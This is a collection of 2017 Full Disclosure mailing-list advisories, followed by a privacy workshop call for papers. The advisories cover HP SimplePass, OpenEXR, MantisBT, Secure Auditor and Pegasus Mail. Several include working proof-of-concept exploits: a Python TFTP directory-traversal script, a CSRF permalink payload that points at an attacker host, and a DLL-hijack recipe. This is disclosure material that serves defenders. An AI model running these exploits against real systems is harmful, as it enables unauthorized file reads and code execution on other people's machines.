[FD] HP SimplePass Local Privilege Escalation
# Vulnerability Title: HP SimplePass Local Privilege Escalation # Advisory Release Date: 05/18/2017 # Credit: Discovered By Rehan Ahmed # Contact: knight_re...@hotmail.com # Severity Level: Medium # Type: Local # Tested Platform: Windows 8 & 10 x64 # Vendor: HP Inc. # Vendor Site: http://www.hp.com # Download Link: http://ftp.hp.com/pub/softpaq/sp64001-64500/sp64339.exe # Vulnerable Version: HP SimplePass 8.00.49, 8.00.57, 8.01.46 # Vendor Contacted: 04/03/2017 # Vendor Response: 5/18/2017 Summary: HP SimplePass allows you to safely store logon information for your favorite websites, and use a single method of authentication for your password-protected website accounts. Choose a fingerprint, password or PIN to authenticate your identity. Your computer must have at least one password-protected Windows User Account to use HP SimplePass. https://support.hp.com/us-en/document/c03653209 # Issue Details: # HP SimplePass is prone to a local privilege-escalation vulnerability due to insecure file system permissions that have been granted during installation. Local adversary can exploit this issue to gain elevated privileges on affected system. HP SimplePass installs by default to "C:\Program Files\Hewlett-Packard\SimplePass" with very weak folder permissions granting any user full permission to the contents of the directory and it's subfolders. This allows ample opportunity for code execution against any other user running the application. HP SimplePass has few binaries which are typically configured as a service or startup program which makes this particularly easy to take leverage. ## Proof of Concept ## a) C:\>icacls "C:\Program Files\Hewlett-Packard\SimplePass" C:\Program Files\Hewlett-Packard\SimplePass Everyone:(F) Everyone:(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) NT AUTHORITY\Authenticated Users:(I)(M) NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) b) C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i "HP SimplePass" HP SimplePass Cachedrv Service Cachedrv server "C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe" Auto HP SimplePass Service omniserv C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe Auto A user can place a malicious DLL/EXE (e.g OmniServ.exe) file with one of the expected names into that directory and wait until the service is restarted. The service can not be restarted by normal users but an attacker could just reboot the system or wait for the next reboot to happen. ### 3) Mitigation: ### Change the permission for dirctory to group other than Administrator on Read/Execute. Fix: https://support.hp.com/us-en/drivers/selfservice/hp-envy-m7-n100-notebook-pc/8499292/model/8788306 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] [oss-security] Multiple crashes in OpenEXR
> On May 12, 2017, at 1:48 PM, Brandon Perry wrote: > > >> On May 12, 2017, at 1:45 PM, Henri Salo wrote: >> >> On Fri, May 12, 2017 at 12:09:30PM -0500, Brandon Perry wrote: >>> As of this writing, . No CVEs have been requested. >> >> Why not? > > I’m lazy. I might this weekend. > Attached is the email from MITRE regarding the 7 CVE allocations. --- Begin Message --- -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 The 7 CVE IDs are below. In our web form, the field sizes are unfortunately not large enough for the full Valgrind output; however, we understand that the intention was to send the Valgrind output in the attached ZIP file of the http://marc.info/?l=oss-security&m=149460897719400&w=2 post. > [Suggested description] > In OpenEXR 2.2.0, > an invalid read of size 2 in the hufDecode function in ImfHuf.cpp > could cause the application to crash. > > -- > > [Additional Information] > ==25145== Memcheck, a memory error detector > ==25145== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. > ==25145== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info > ==25145== Command: /root/openexr/OpenEXR/exr2aces/build/exr2aces > id:12,sig:11,src:000328+001154,op:splice,rep:16 /dev/null > ==25145== > ==25145== Invalid read of size 2 > ==25145==at 0x4EDC452: hufDecode (ImfHuf.cpp:898) > ==25145==by 0x4EDC452: Imf_2_2::hufUncompress(char const*, int, unsigned > short*, int) (ImfHuf.cpp:1101) > ==25145==by 0x4EE5680: Imf_2_2::PizCompressor::uncompress(char const*, > int, Imath_2_2::Box >, char const*&) > (ImfPizCompressor.cpp:576) > ==25145==by 0x4EE4E9D: Imf_2_2::PizCompressor::uncompress(char const*, > int, int, char const*&) (ImfPizCompressor.cpp:284) > ==25145==by 0x4F5F4A3: Imf_2_2::(anonymous > namespace)::LineBufferTask::execute() (ImfScanLineInputFile.cpp:540) > ==25145==by 0x54587BD: > IlmThread_2_2::ThreadPool::addTask(IlmThread_2_2::Task*) > (IlmThreadPool.cpp:433) > ==25145==by 0x4F58B47: Imf_2_2::ScanLineInputFile::readPixels(int, int) > (ImfScanLineInputFile.cpp:1612) > ==25145==by 0x4EB603F: Imf_2_2::InputFile::readPixels(int, int) > (ImfInputFile.cpp:815) > ==25145==by 0x4ED4C42: Imf_2_2::RgbaInputFile::readPixels(int, int) > (ImfRgbaFile.cpp:1302) > ==25145==by 0x4FB2416: Imf_2_2::AcesInputFile::readPixels(int, int) > (ImfAcesFile.cpp:509) > ==25145==by 0x40283D: exr2aces (main.cpp:128) > ==25145==by 0x40283D: main (main.cpp:220) > ==25145== Address 0x717c03e is 2 bytes before a block of size 8,356,352 > alloc'd > ==25145==at 0x4C2E80F: operator new[](unsigned long) (in > /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) > ==25145==by 0x4EE26EA: > Imf_2_2::PizCompressor::PizCompressor(Imf_2_2::Header const&, unsigned long, > unsigned long) (ImfPizCompressor.cpp:193) > ==25145==by 0x4EE0767: Imf_2_2::newCompressor(Imf_2_2::Compression, > unsigned long, Imf_2_2::Header const&) (ImfCompressor.cpp:148) > == ... > > -- > > [Vulnerability Type] > Buffer Overflow > > -- > > [Vendor of Product] > Industrial Light & Magic > > -- > > [Affected Product Code Base] > OpenEXR - 2.2.0 > > -- > > [Affected Component] > ImfHuf.cpp, hufDecode function > > -- > > [Attack Type] > Local > > -- > > [Impact Denial of Service] > true > > -- > > [Impact Information Disclosure] > true > > -- > > [Attack Vectors] > Someone must open a crafted > > -- > > [Reference] > http://www.openwall.com/lists/oss-security/2017/05/12/5 > > -- > > [Discoverer] > Brandon Perry Use CVE-2017-9110. > [Suggested description] > In OpenEXR 2.2.0, > an invalid write of size 8 in the storeSSE function in > ImfOptimizedPixelReading.h could cause the application to crash or > execute arbitrary code. > > -- > > [Additional Information] > ==1726== Memcheck, a memory error detector > ==1726== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. > ==1726== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info > ==1726== Command: /root/openexr/OpenEXR/exr2aces/build/exr2aces > id:87,sig:11,src:000562+000300,op:splice,rep:2 /dev/null > ==1726== > ==1726== Invalid write of size 8 > ==1726==at 0x4F5C940: storeSSE (ImfOptimizedPixelReading.h:125) > ==1726==by 0x4F5C940: writeToRGBASSETemplate > (ImfOptimizedPixelReading.h:166) > ==1726==by 0x4F5C940: optimizedWriteToRGBA > (ImfOptimizedPixelReading.h:248) > ==1726==by 0x4F5C940: Imf_2_2::(anonymous > namespace)::LineBufferTaskIIF::execute
[FD] CVE-2017-7620 Mantis Bug Tracker 1.3.10 / v2.3.0 CSRF Permalink Injection
[+] Credits: John Page a.k.a hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt [+] ISR: ApparitionSec Vendor: www.mantisbt.org Product: = Mantis Bug Tracker 1.3.10 / v2.3.0 MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases. Vulnerability Type: CSRF Permalink Injection CVE Reference: == CVE-2017-7620 Security Issue: Remote attackers can inject arbitrary permalinks into the mantisbt Web Interface if an authenticated user visits a malicious webpage. Vuln code in "string_api.php" PHP file, under mantis/core/ did not account for supplied backslashes. Line: 270 # Check for URL's pointing to other domains if( 0 == $t_type || empty( $t_matches['script'] ) || 3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) { return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php'; } # Start extracting regex matches $t_script = $t_matches['script']; $t_script_path = $t_matches['path']; Exploit/POC: = http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP"; method="POST"> document.forms[0].submit() OR http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0"; method="POST"> document.forms[0].submit() Network Access: === Remote Severity: = Medium Disclosure Timeline: = Vendor Notification: April 9, 2017 Vendor Release Fix: May 15, 2017 Vendor Disclosed: May 20, 2017 May 20, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal
*** Added the product description... *** [+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt [+] ISR: ApparitionSec Vendor: www.secure-bytes.com Product: = Secure Auditor - v3.0 Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases and Cisco devices. Vulnerability Type: === Directory Traversal CVE Reference: == CVE-2017-9024 Security Issue: Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname. Exploit/POC: = import sys,socket print 'Secure Auditor v3.0 / Cisco Config Manager' print 'TFTP Directory Traversal Exploit' print 'Read ../../../../Windows/system.ini POC' print 'hyp3rlinx' HOST = raw_input("[IP]> ") FILE = '../../../../Windows/system.ini' PORT = 69 PAYLOAD = "\x00\x01"#TFTP Read PAYLOAD += FILE+"\x00" #Read system.ini using directory traversal PAYLOAD += "netascii\x00" #TFTP Type s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(PAYLOAD, (HOST, PORT)) out = s.recv(1024) s.close() print "Victim Data located on : %s " %(HOST) print out.strip() Network Access: === Remote Severity: = High Disclosure Timeline: == Vendor Notification: May 10, 2017 No replies May 20, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx On Sat, May 20, 2017 at 12:14 AM, hyp3rlinx wrote: > [+] Credits: John Page aka HYP3RLINX > [+] Website: hyp3rlinx.altervista.org > [+] Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR- > v3.0-DIRECTORY-TRAVERSAL.txt > [+] ISR: ApparitionSec > > > > Vendor: > > www.secure-bytes.com > > > > Product: > = > Secure Auditor - v3.0 > > > > Vulnerability Type: > === > Directory Traversal > > > > CVE Reference: > == > CVE-2017-9024 > > > > Security Issue: > > Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes > Secure Cisco Auditor (SCA) 3.0, has a > Directory Traversal issue in its TFTP Server, allowing attackers to read > arbitrary files via ../ sequences in a pathname. > > > > > Exploit/POC: > = > import sys,socket > > print 'Secure Auditor v3.0 / Cisco Config Manager' > print 'TFTP Directory Traversal Exploit' > print 'Read ../../../../Windows/system.ini POC' > print 'hyp3rlinx' > > HOST = raw_input("[IP]> ") > FILE = '../../../../Windows/system.ini' > PORT = 69 > > PAYLOAD = "\x00\x01"#TFTP Read > PAYLOAD += FILE+"\x00" #Read system.ini using directory > traversal > PAYLOAD += "netascii\x00" #TFTP Type > > s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) > s.sendto(PAYLOAD, (HOST, PORT)) > out = s.recv(1024) > s.close() > > print "Victim Data located on : %s " %(HOST) > print out.strip() > > > > Network Access: > === > Remote > > > > > Severity: > = > High > > > > Disclosure Timeline: > == > Vendor Notification: May 10, 2017 > No replies > May 20, 2017 : Public Disclosure > > > > [+] Disclaimer > The information contained within this advisory is supplied "as-is" with no > warranties or guarantees of fitness of use or otherwise. > Permission is hereby granted for the redistribution of this advisory, > provided that it is not altered except by reformatting it, and > that due credit is given. Permission is explicitly given for insertion in > vulnerability databases and similar, provided that due credit > is given to the author. The author is not responsible for any misuse of > the information contained herein and accepts no responsibility > for any damage caused by the use or misuse of this information. The author > prohibits any malicious use of security related information > or exploits by the author or elsewhere. All content (c). > > hyp3rlinx >
[FD] CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt [+] ISR: ApparitionSec Vendor: www.secure-bytes.com Product: = Secure Auditor - v3.0 Vulnerability Type: === Directory Traversal CVE Reference: == CVE-2017-9024 Security Issue: Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname. Exploit/POC: = import sys,socket print 'Secure Auditor v3.0 / Cisco Config Manager' print 'TFTP Directory Traversal Exploit' print 'Read ../../../../Windows/system.ini POC' print 'hyp3rlinx' HOST = raw_input("[IP]> ") FILE = '../../../../Windows/system.ini' PORT = 69 PAYLOAD = "\x00\x01"#TFTP Read PAYLOAD += FILE+"\x00" #Read system.ini using directory traversal PAYLOAD += "netascii\x00" #TFTP Type s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(PAYLOAD, (HOST, PORT)) out = s.recv(1024) s.close() print "Victim Data located on : %s " %(HOST) print out.strip() Network Access: === Remote Severity: = High Disclosure Timeline: == Vendor Notification: May 10, 2017 No replies May 20, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2017-9046 Pegasus "winpm-32.exe" v4.72 Mailto: Link Remote Code Execution
[+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt [+] ISR: APPARITIONSEC Vendor: = www.pmail.com Product: === Pegasus "winpm-32.exe" v4.72 build 572 Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail client suitable for use by single or multiple users on single computers or on local area networks. A proven product, it has served millions of users since it was released in 1990. Vulnerability Type: == Remote Code Execution CVE Reference: == CVE-2017-9046 Security Issue: Pegasus Mail has a DLL Load Flaw that allows arbitrary code execution by clicking an HTML "mailto:"; link if a DLL named "ssgp.dll" exists on the victims Desktop. Tested successfully using Internet Explorer Web Browser. e.g. mailto:n...@victim.com";>Link text Place "ssgp.dll" on the desktop then visit the webpage in "Internet Explorer", click the mailto: link arbitrary code executed and Pegasus (pmail) is then launched. User needs to have setup PMAIL with "mailto:"; link option on install. Exploit: 1) Set Pegasus as default Email client for opening Emails, and setup PMAIL with "mailto:"; link option on install. 2) Compile "ssgp.dll" as DLL using below 'C' code. #include //gcc -c ssgp.c //gcc -shared -o ssgp.dll ssgp.o BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK); break; } return 0; } 3) Place "ssgp.dll" on Desktop 4) Create an HTML file with following in the web server root directory. mailto:n...@victim.com";>Pegasus Exploit POC 5) Open webpage in InternetExplorer Web Browser and click malicious mailto: link. Our code gets executed... Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: October 8, 2016 Vendor supposedly fixed: January 21, 2016 May 19, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CFP - WPES - 2017 Workshop on Privacy in the Electronic Society
CALL FOR PAPERS === ** 2017 Workshop on Privacy in the Electronic Society (WPES 2017) Dallas, Texas, USA - October 30, 2017 https://cs.pitt.edu/wpes2017 ** The need for privacy-aware policies, regulations, and techniques has been widely recognized. This workshop discusses the problems of privacy in the global interconnected societies and possible solutions. The 2017 Workshop, held in conjunction with the ACM CCS conference, is the sixteenth in a yearly forum for papers on all the different aspects of privacy in today's electronic society. The workshop seeks submissions from academia and industry presenting novel research on all theoretical and practical aspects of electronic privacy, as well as experimental studies of fielded systems. We encourage submissions from other communities such as law and business that present these communities' perspectives on technological issues. Topics of interest include, but are not limited to: - anonymization and trasparency - crowdsourcing for privacy and security - data correlation and leakage attacks - data security and privacy - data and computations integrity in emerging scenarios - electronic communication privacy - economics of privacy - information dissemination control - models, languages, and techniques for big data protection - personally identifiable information - privacy-aware access control - privacy and anonymity on the web - privacy in biometric systems - privacy in cloud and grid systems - privacy and confidentiality management - privacy and data mining - privacy in the Internet of Things - privacy in the digital business - privacy in the electronic records - privacy enhancing technologies - privacy and human rights - privacy in health care and public administration - privacy metrics - privacy in mobile systems - privacy in outsourced scenarios - privacy policies - privacy vs. security - privacy of provenance data - privacy in social networks - privacy threats - privacy and virtual identity - user profiling - wireless privacy PAPER SUBMISSIONS - Submitted papers must not substantially overlap papers that have been published or that are simultaneously submitted to a journal or a conference with proceedings. Regular submissions should be at most 10 pages in the ACM double-column format (http://www.acm.org/sigs/publications/proceedings-templates) including bibliography, but excluding well-marked appendices, and at most 12 pages total. Committee members are not required to read the appendices, and so the paper should be intelligible without them. Submissions should not be anonymized. The workshop will also consider short submissions of up to 4 pages for results that are preliminary or that simply require few pages to describe. Authors of regular submitted papers will indicate at the time of submission whether they would like their paper to also be considered for publication as a short paper (4 proceedings pages). Submissions are to be made to the submission web site at https://easychair.org/conferences/?conf=wpes2017. You will be requested to upload the file of your paper (in PDF format only). Submissions not meeting these guidelines risk rejection without consideration of their merits. Papers must be received by the deadline of **August 4, 2016** to be considered. Notification of acceptance or rejection will be sent to authors by September 8, 2017. The camera ready must be prepared by September 17, 2017 (firm). Proceedings of the workshop will be published by ACM on a CD, available to the workshop attendees. Papers will be included in the ACM Digital Library, with a specific ISBN. Each accepted paper must be presented by an author, who will have to be registered by the early-bird registration deadline. IMPORTANT DATES --- Paper Submission due: August 4, 2017 (11:59 PM American Samoa Time) Notification to authors: September 8, 2017 (11:59 PM American Samoa Time) Camera ready due: September 17, 2017 PROGRAM CHAIR - Adam J. Lee University of Pittsburgh, USA PUBLICITY CHAIR --- William C. Garrison III University of Pittsburgh, USA PROGRAM COMMITTEE - TBD STEERING COMMITTEE -- Sabrina De Capitani di Vimercati, Università degli Studi di Milano, Italy Sushil Jajodia, George Mason University, USA Pierangela Samarati (Chair), Università degli Studi di Milano, Italy Paul Syverson, Naval Research Laboratory, USA Submissions are to be made at: https://easychair.org/conferences/?conf=wpes2017 This call for papers and additional information about the conference can be found at https://cs.pitt.edu/wpes2017 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/